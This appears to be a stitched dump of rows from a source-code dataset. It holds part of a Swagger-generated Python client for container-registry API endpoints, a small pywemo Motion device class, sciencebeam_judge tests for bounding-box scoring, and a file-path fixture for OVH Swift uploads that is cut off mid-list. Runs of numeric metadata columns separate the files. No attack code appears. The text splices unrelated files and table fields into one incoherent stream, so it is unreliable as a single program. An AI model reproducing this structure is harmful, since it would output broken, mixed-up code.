>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.add_registry(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param Registry registry:
:return: Registry
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.add_registry_with_http_info(**kwargs)
else:
(data) = self.add_registry_with_http_info(**kwargs)
return data
def add_registry_with_http_info(self, **kwargs):
"""
Create new registry definition
Creates a registry object which can then be used to specify where container images are stored. ID SHOULD NOT be passed when creating a new registry.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.add_registry_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param Registry registry:
:return: Registry
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['registry']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_registry" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'registry' in params:
body_params = params['registry']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['ApiKey']
return self.api_client.call_api('/Registries', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Registry',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_registry(self, registry_id, **kwargs):
"""
Delete specified registry
Deletes the specified registry.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_registry(registry_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str registry_id: hexadecimal ID of registry to delete (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_registry_with_http_info(registry_id, **kwargs)
else:
(data) = self.delete_registry_with_http_info(registry_id, **kwargs)
return data
def delete_registry_with_http_info(self, registry_id, **kwargs):
"""
Delete specified registry
Deletes the specified registry.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_registry_with_http_info(registry_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str registry_id: hexadecimal ID of registry to delete (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['registry_id']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_registry" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'registry_id' is set
if ('registry_id' not in params) or (params['registry_id'] is None):
raise ValueError("Missing the required parameter `registry_id` when calling `delete_registry`")
collection_formats = {}
path_params = {}
if 'registry_id' in params:
path_params['registryID'] = params['registry_id']
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['ApiKey']
return self.api_client.call_api('/Registries/{registryID}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_registries(self, **kwargs):
"""
Get defined registries
Returns a list of defined images that are accessible to this user.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_registries(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: Registries
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_registries_with_http_info(**kwargs)
else:
(data) = self.get_registries_with_http_info(**kwargs)
return data
def get_registries_with_http_info(self, **kwargs):
"""
Get defined registries
Returns a list of defined images that are accessible to this user.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_registries_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: Registries
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_registries" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['ApiKey']
return self.api_client.call_api('/Registries', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Registries',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_registry(self, registry_id, **kwargs):
"""
Get specified registry
Returns details about the specified registry.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_registry(registry_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str registry_id: hexadecimal ID of registry to get (required)
:return: Registry
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_registry_with_http_info(registry_id, **kwargs)
else:
(data) = self.get_registry_with_http_info(registry_id, **kwargs)
return data
def get_registry_with_http_info(self, registry_id, **kwargs):
"""
Get specified registry
Returns details about the specified registry.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_registry_with_http_info(registry_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str registry_id: hexadecimal ID of registry to get (required)
:return: Registry
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['registry_id']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_registry" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'registry_id' is set
if ('registry_id' not in params) or (params['registry_id'] is None):
raise ValueError("Missing the required parameter `registry_id` when calling `get_registry`")
collection_formats = {}
path_params = {}
if 'registry_id' in params:
path_params['registryID'] = params['registry_id']
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['ApiKey']
return self.api_client.call_api('/Registries/{registryID}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Registry',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_registry_by_name(self, registry_name, **kwargs):
"""
Get registry by name
Returns details about a registry matching the passed name.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_registry_by_name(registry_name, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str registry_name: Name of registry to get (required)
:return: Registry
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_registry_by_name_with_http_info(registry_name, **kwargs)
else:
(data) = self.get_registry_by_name_with_http_info(registry_name, **kwargs)
return data
def get_registry_by_name_with_http_info(self, registry_name, **kwargs):
"""
Get registry by name
Returns details about a registry matching the passed name.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_registry_by_name_with_http_info(registry_name, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str registry_name: Name of registry to get (required)
:return: Registry
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['registry_name']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_registry_by_name" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'registry_name' is set
if ('registry_name' not in params) or (params['registry_name'] is None):
raise ValueError("Missing the required parameter `registry_name` when calling `get_registry_by_name`")
collection_formats = {}
path_params = {}
if 'registry_name' in params:
path_params['registryName'] = params['registry_name']
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['ApiKey']
return self.api_client.call_api('/RegistriesByName/{registryName}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Registry',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_all_images_in_registry(self, registry_id, **kwargs):
"""
Get container images in registry
Returns an array of images which are definied as using the specified registry.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_all_images_in_registry(registry_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str registry_id: hexadecimal ID of registry to get list of images for (required)
:return: Image
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_all_images_in_registry_with_http_info(registry_id, **kwargs)
else:
(data) = self.list_all_images_in_registry_with_http_info(registry_id, **kwargs)
return data
def list_all_images_in_registry_with_http_info(self, registry_id, **kwargs):
"""
Get container images in registry
Returns an array of images which are definied as using the specified registry.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_all_images_in_registry_with_http_info(registry_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str registry_id: hexadecimal ID of registry to get list of images for (required)
:return: Image
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['registry_id']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_all_images_in_registry" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'registry_id' is set
if ('registry_id' not in params) or (params['registry_id'] is None):
raise ValueError("Missing the required parameter `registry_id` when calling `list_all_images_in_registry`")
collection_formats = {}
path_params = {}
if 'registry_id' in params:
path_params['registryID'] = params['registry_id']
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['ApiKey']
return self.api_client.call_api('/Registries/{registryID}/Images', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Image',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_registry(self, registry_id, **kwargs):
"""
Update specified registry
Updates the specified registry with data passed in request body.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_registry(registry_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str registry_id: hexadecimal ID of registry to update (required)
:param Registry registry:
:return: Registry
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.update_registry_with_http_info(registry_id, **kwargs)
else:
(data) = self.update_registry_with_http_info(registry_id, **kwargs)
return data
def update_registry_with_http_info(self, registry_id, **kwargs):
"""
Update specified registry
Updates the specified registry with data passed in request body.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_registry_with_http_info(registry_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str registry_id: hexadecimal ID of registry to update (required)
:param Registry registry:
:return: Registry
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['registry_id', 'registry']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_registry" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'registry_id' is set
if ('registry_id' not in params) or (params['registry_id'] is None):
raise ValueError("Missing the required parameter `registry_id` when calling `update_registry`")
collection_formats = {}
path_params = {}
if 'registry_id' in params:
path_params['registryID'] = params['registry_id']
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'registry' in params:
body_params = params['registry']
# Authentication setting
auth_settings = ['ApiKey']
return self.api_client.call_api('/Registries/{registryID}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Registry',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 41.814234
| 383
| 0.568659
| 3,468
| 34,664
| 5.44406
| 0.065167
| 0.067797
| 0.023729
| 0.030508
| 0.933422
| 0.918326
| 0.911229
| 0.896981
| 0.890466
| 0.883316
| 0
| 0.00027
| 0.358181
| 34,664
| 828
| 384
| 41.864734
| 0.848346
| 0.343353
| 0
| 0.771144
| 0
| 0
| 0.153681
| 0.03606
| 0
| 0
| 0
| 0
| 0
| 1
| 0.042289
| false
| 0
| 0.017413
| 0
| 0.121891
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4f5055fbc951fb80bc365c15976e620d24ef2065
| 141
|
py
|
Python
|
pywemo/ouimeaux_device/motion.py
|
sullivanmj/pywemo
|
2ef78e015476f5e983c1f39eefa3f274a4685bdd
|
[
"MIT"
] | 102
|
2016-01-07T17:13:02.000Z
|
2021-03-11T09:04:20.000Z
|
pywemo/ouimeaux_device/motion.py
|
sullivanmj/pywemo
|
2ef78e015476f5e983c1f39eefa3f274a4685bdd
|
[
"MIT"
] | 188
|
2015-12-31T08:50:41.000Z
|
2021-03-10T16:51:26.000Z
|
pywemo/ouimeaux_device/motion.py
|
sullivanmj/pywemo
|
2ef78e015476f5e983c1f39eefa3f274a4685bdd
|
[
"MIT"
] | 61
|
2016-02-16T02:28:17.000Z
|
2021-03-07T23:05:38.000Z
|
"""Representation of a WeMo Motion device."""
from . import Device
class Motion(Device):
"""Representation of a WeMo Motion device."""
| 20.142857
| 49
| 0.702128
| 18
| 141
| 5.5
| 0.5
| 0.363636
| 0.343434
| 0.424242
| 0.666667
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0.170213
| 141
| 6
| 50
| 23.5
| 0.846154
| 0.560284
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
4f832be468d00585f80412a909f1d8e2699a39ab
| 11,237
|
py
|
Python
|
tests/evaluation/custom/bounding_box_intersection_test.py
|
elifesciences/sciencebeam-judge
|
357f1b4266674611b24371224468db268ed4574e
|
[
"MIT"
] | null | null | null |
tests/evaluation/custom/bounding_box_intersection_test.py
|
elifesciences/sciencebeam-judge
|
357f1b4266674611b24371224468db268ed4574e
|
[
"MIT"
] | 189
|
2018-01-11T17:14:18.000Z
|
2022-03-28T17:30:11.000Z
|
tests/evaluation/custom/bounding_box_intersection_test.py
|
elifesciences/sciencebeam-judge
|
357f1b4266674611b24371224468db268ed4574e
|
[
"MIT"
] | null | null | null |
from sciencebeam_judge.utils.bounding_box import (
EMPTY_PAGE_BOUNDING_BOX_LIST,
BoundingBox,
PageBoundingBox,
PageBoundingBoxList
)
from sciencebeam_judge.evaluation.custom.bounding_box_intersection import (
DEFAULT_BOUNDING_BOX_RESOLUTION,
DEFAULT_BOUNDING_BOX_SCORING_TYPE_NAME,
BoundingBoxIntersectionAreaEvaluation,
BoundingBoxIntersectionEvaluation,
format_page_bounding_box_list,
get_formatted_page_bounding_box_list_area_match_score,
get_page_bounding_box_list_area_match_score,
parse_page_bounding_box_list
)
DEFAULT_BOUNDING_BOX_SQUARED_RESOLUTION = (
DEFAULT_BOUNDING_BOX_RESOLUTION * DEFAULT_BOUNDING_BOX_RESOLUTION
)
class TestParsePageBoundingBoxList:
def test_should_parse_empty_none(self):
result = parse_page_bounding_box_list(None)
assert not result.page_bounding_box_list
assert not result
def test_should_parse_empty_string(self):
result = parse_page_bounding_box_list('')
assert not result.page_bounding_box_list
assert not result
def test_should_parse_single_bounding_box(self):
result = parse_page_bounding_box_list(
'101,102.22,103.33,104.44,105.55'
)
assert result.page_bounding_box_list
assert result
assert (
result.page_bounding_box_list[0] == PageBoundingBox(
page_number=101,
bounding_box=BoundingBox(
x=102.22, y=103.33, width=104.44, height=105.55
)
)
)
def test_should_parse_multiple_bounding_box(self):
result = parse_page_bounding_box_list(
'101,102.22,103.33,104.44,105.55;'
'201,202.22,203.33,204.44,205.55'
)
assert result.page_bounding_box_list
assert result
assert (
result.page_bounding_box_list == [
PageBoundingBox(
page_number=101,
bounding_box=BoundingBox(
x=102.22, y=103.33, width=104.44, height=105.55
)
),
PageBoundingBox(
page_number=201,
bounding_box=BoundingBox(
x=202.22, y=203.33, width=204.44, height=205.55
)
)
]
)
class TestFormatPageBoundingBoxList:
def test_should_format_empty_page_bounding_box_list(self):
result = format_page_bounding_box_list(PageBoundingBoxList([]))
assert result == ''
def test_should_format_single_page_bounding_box_list_item(self):
result = format_page_bounding_box_list(PageBoundingBoxList([
PageBoundingBox(
page_number=101,
bounding_box=BoundingBox(
x=102.22, y=103.33, width=104.44, height=105.55
)
)
]))
assert result == '101,102.22,103.33,104.44,105.55'
def test_should_format_multiple_page_bounding_box_list_items(self):
result = format_page_bounding_box_list(PageBoundingBoxList([
PageBoundingBox(
page_number=101,
bounding_box=BoundingBox(
x=102.22, y=103.33, width=104.44, height=105.55
)
),
PageBoundingBox(
page_number=201,
bounding_box=BoundingBox(
x=202.22, y=203.33, width=204.44, height=205.55
)
)
]))
assert result == (
'101,102.22,103.33,104.44,105.55;'
'201,202.22,203.33,204.44,205.55'
)
NON_EMPTY_PAGE_BOUNDING_BOX_LIST = PageBoundingBoxList([
PageBoundingBox(
page_number=101,
bounding_box=BoundingBox(
x=102.22, y=103.33, width=104.44, height=105.55
)
)
])
class TestGetPageBoundingBoxListAreaMatchScore:
def test_should_return_zero_for_non_empty_empty_page_bounding_box_list(self):
result = get_page_bounding_box_list_area_match_score(
NON_EMPTY_PAGE_BOUNDING_BOX_LIST,
EMPTY_PAGE_BOUNDING_BOX_LIST
)
assert result == 0.0
def test_should_return_zero_for_empty_non_empty_page_bounding_box_list(self):
result = get_page_bounding_box_list_area_match_score(
EMPTY_PAGE_BOUNDING_BOX_LIST,
NON_EMPTY_PAGE_BOUNDING_BOX_LIST
)
assert result == 0.0
def test_should_return_one_for_equal_page_bounding_box_lists(self):
result = get_page_bounding_box_list_area_match_score(
NON_EMPTY_PAGE_BOUNDING_BOX_LIST,
NON_EMPTY_PAGE_BOUNDING_BOX_LIST
)
assert result == 1.0
def test_should_return_one_for_two_empty_page_bounding_box_lists(self):
result = get_page_bounding_box_list_area_match_score(
EMPTY_PAGE_BOUNDING_BOX_LIST,
EMPTY_PAGE_BOUNDING_BOX_LIST
)
assert result == 1.0
def test_should_return_dot_five_for_half_overlapping_page_bounding_box_lists(self):
result = get_page_bounding_box_list_area_match_score(
PageBoundingBoxList([PageBoundingBox(
page_number=101,
bounding_box=BoundingBox(
x=102.22, y=103.33, width=200, height=100
)
)]),
PageBoundingBoxList([PageBoundingBox(
page_number=101,
bounding_box=BoundingBox(
x=102.22, y=103.33, width=200, height=50
)
)])
)
assert round(result, 3) == 0.5
class TestGetFormattedPageBoundingBoxListAreaMatchScore:
def test_should_return_zero_for_non_empty_empty_page_bounding_box_list(self):
result = get_formatted_page_bounding_box_list_area_match_score(
format_page_bounding_box_list(NON_EMPTY_PAGE_BOUNDING_BOX_LIST),
''
)
assert result == 0.0
def test_should_return_zero_for_empty_non_empty_page_bounding_box_list(self):
result = get_formatted_page_bounding_box_list_area_match_score(
'',
format_page_bounding_box_list(NON_EMPTY_PAGE_BOUNDING_BOX_LIST)
)
assert result == 0.0
def test_should_return_one_for_equal_page_bounding_box_lists(self):
result = get_formatted_page_bounding_box_list_area_match_score(
format_page_bounding_box_list(NON_EMPTY_PAGE_BOUNDING_BOX_LIST),
format_page_bounding_box_list(NON_EMPTY_PAGE_BOUNDING_BOX_LIST)
)
assert result == 1.0
def test_should_return_dot_five_for_half_overlapping_page_bounding_box_lists(self):
result = get_formatted_page_bounding_box_list_area_match_score(
format_page_bounding_box_list(PageBoundingBoxList([PageBoundingBox(
page_number=101,
bounding_box=BoundingBox(
x=102.22, y=103.33, width=200, height=100
)
)])),
format_page_bounding_box_list(PageBoundingBoxList([PageBoundingBox(
page_number=101,
bounding_box=BoundingBox(
x=102.22, y=103.33, width=200, height=50
)
)]))
)
assert round(result, 3) == 0.5
class TestBoundingBoxIntersectionEvaluation:
def test_should_be_able_to_pass_in_config(self):
custom_evaluation = BoundingBoxIntersectionEvaluation(
config={'scoring_type': 'set'}
)
assert custom_evaluation.scoring_type_name == 'set'
def test_should_use_default_scoring_type_if_blank(self):
custom_evaluation = BoundingBoxIntersectionEvaluation(
config={'scoring_type': ''}
)
assert custom_evaluation.scoring_type_name == DEFAULT_BOUNDING_BOX_SCORING_TYPE_NAME
def test_should_use_default_without_config(self):
custom_evaluation = BoundingBoxIntersectionEvaluation()
assert custom_evaluation.scoring_type_name == DEFAULT_BOUNDING_BOX_SCORING_TYPE_NAME
def test_should_return_zero_for_non_empty_empty_page_bounding_box_list(self):
result = BoundingBoxIntersectionEvaluation().score(
[format_page_bounding_box_list(NON_EMPTY_PAGE_BOUNDING_BOX_LIST)],
['']
)
assert result.score == 0.0
def test_should_return_zero_for_empty_non_empty_page_bounding_box_list(self):
result = BoundingBoxIntersectionEvaluation().score(
[''],
[format_page_bounding_box_list(NON_EMPTY_PAGE_BOUNDING_BOX_LIST)]
)
assert result.score == 0.0
def test_should_return_one_for_equal_page_bounding_box_lists(self):
result = BoundingBoxIntersectionEvaluation().score(
[format_page_bounding_box_list(NON_EMPTY_PAGE_BOUNDING_BOX_LIST)],
[format_page_bounding_box_list(NON_EMPTY_PAGE_BOUNDING_BOX_LIST)]
)
assert result.score == 1.0
class TestBoundingBoxIntersectionAreaEvaluation:
def test_should_return_zero_for_non_empty_empty_page_bounding_box_list(self):
result = BoundingBoxIntersectionAreaEvaluation().score(
[format_page_bounding_box_list(NON_EMPTY_PAGE_BOUNDING_BOX_LIST)],
['']
)
assert result.score == 0.0
assert result.true_positive == 0
assert result.false_positive == 0
assert result.false_negative == round(
NON_EMPTY_PAGE_BOUNDING_BOX_LIST.area * DEFAULT_BOUNDING_BOX_SQUARED_RESOLUTION
)
def test_should_return_zero_for_empty_non_empty_page_bounding_box_list(self):
result = BoundingBoxIntersectionAreaEvaluation().score(
[''],
[format_page_bounding_box_list(NON_EMPTY_PAGE_BOUNDING_BOX_LIST)]
)
assert result.score == 0.0
assert result.true_positive == 0
assert result.false_positive == round(
NON_EMPTY_PAGE_BOUNDING_BOX_LIST.area * DEFAULT_BOUNDING_BOX_SQUARED_RESOLUTION
)
assert result.false_negative == 0
def test_should_return_one_for_equal_page_bounding_box_lists(self):
result = BoundingBoxIntersectionAreaEvaluation().score(
[format_page_bounding_box_list(NON_EMPTY_PAGE_BOUNDING_BOX_LIST)],
[format_page_bounding_box_list(NON_EMPTY_PAGE_BOUNDING_BOX_LIST)]
)
assert result.score == 1.0
assert result.true_positive == round(
NON_EMPTY_PAGE_BOUNDING_BOX_LIST.area * DEFAULT_BOUNDING_BOX_SQUARED_RESOLUTION
)
assert result.false_positive == 0
assert result.false_negative == 0
def test_should_be_able_to_configure_resolution(self):
result = BoundingBoxIntersectionAreaEvaluation({
'resolution': 100
}).score(
[format_page_bounding_box_list(NON_EMPTY_PAGE_BOUNDING_BOX_LIST)],
[format_page_bounding_box_list(NON_EMPTY_PAGE_BOUNDING_BOX_LIST)]
)
assert result.score == 1.0
assert result.true_positive == round(
NON_EMPTY_PAGE_BOUNDING_BOX_LIST.scale_by(100, 100).area
)
assert result.false_positive == 0
assert result.false_negative == 0
| 37.708054
| 92
| 0.66281
| 1,300
| 11,237
| 5.228462
| 0.083077
| 0.182875
| 0.194203
| 0.226423
| 0.88848
| 0.848757
| 0.835663
| 0.787112
| 0.770781
| 0.760335
| 0
| 0.051785
| 0.269645
| 11,237
| 297
| 93
| 37.835017
| 0.77641
| 0
| 0
| 0.590038
| 0
| 0
| 0.02029
| 0.01673
| 0
| 0
| 0
| 0
| 0.168582
| 1
| 0.099617
| false
| 0.003831
| 0.007663
| 0
| 0.130268
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4f8c28c8d646398cc7d6e08dac9373735e232bb9
| 1,898
|
py
|
Python
|
tests/unit_tests/fixtures/swift_object.py
|
Barometre-de-la-Science-Ouverte/bso3-harvest-publication
|
06c729a1e44ed87e8f73b4c2bd456f5e09a73e34
|
[
"MIT"
] | null | null | null |
tests/unit_tests/fixtures/swift_object.py
|
Barometre-de-la-Science-Ouverte/bso3-harvest-publication
|
06c729a1e44ed87e8f73b4c2bd456f5e09a73e34
|
[
"MIT"
] | null | null | null |
tests/unit_tests/fixtures/swift_object.py
|
Barometre-de-la-Science-Ouverte/bso3-harvest-publication
|
06c729a1e44ed87e8f73b4c2bd456f5e09a73e34
|
[
"MIT"
] | null | null | null |
import json
import os
from infrastructure.storage.swift import Swift
from config.harvester_config import config_harvester
from domain.ovh_path import OvhPath
_swift = Swift(config_harvester)
local_dir = [
'./tmp/downloaded_publications/9fea8e3a-344c-4552-874c-6852074bcdd1.json',
'./tmp/downloaded_publications/9fea8e3a-344c-4552-874c-6852074bcdd1.software.json',
'./tmp/downloaded_publications/9fea8e3a-344c-4552-874c-6852074bcdd1.tei.xml',
'./tmp/downloaded_publications/9fea8e3a-344c-4552-874c-6852074bcdd1.pdf',
'./tmp/downloaded_publications/dcd41f3e-4dcb-41b4-8d60-bc8abce3ee38.software.json',
'./tmp/downloaded_publications/dcd41f3e-4dcb-41b4-8d60-bc8abce3ee38.tei.xml',
'./tmp/downloaded_publications/dcd41f3e-4dcb-41b4-8d60-bc8abce3ee38.json',
'./tmp/downloaded_publications/dcd41f3e-4dcb-41b4-8d60-bc8abce3ee38.pdf'
]
grobid_files_to_upload = [
(
'./tmp/downloaded_publications/9fea8e3a-344c-4552-874c-6852074bcdd1.tei.xml',
OvhPath('grobid', '9f', 'ea', '8e', '3a', '9fea8e3a-344c-4552-874c-6852074bcdd1', '9fea8e3a-344c-4552-874c-6852074bcdd1.tei.xml')
),
(
'./tmp/downloaded_publications/dcd41f3e-4dcb-41b4-8d60-bc8abce3ee38.tei.xml',
OvhPath('grobid', 'dc', 'd4', '1f', '3e', 'dcd41f3e-4dcb-41b4-8d60-bc8abce3ee38', 'dcd41f3e-4dcb-41b4-8d60-bc8abce3ee38.tei.xml')
),
]
softcite_files_to_upload = [
(
'./tmp/downloaded_publications/9fea8e3a-344c-4552-874c-6852074bcdd1.software.json',
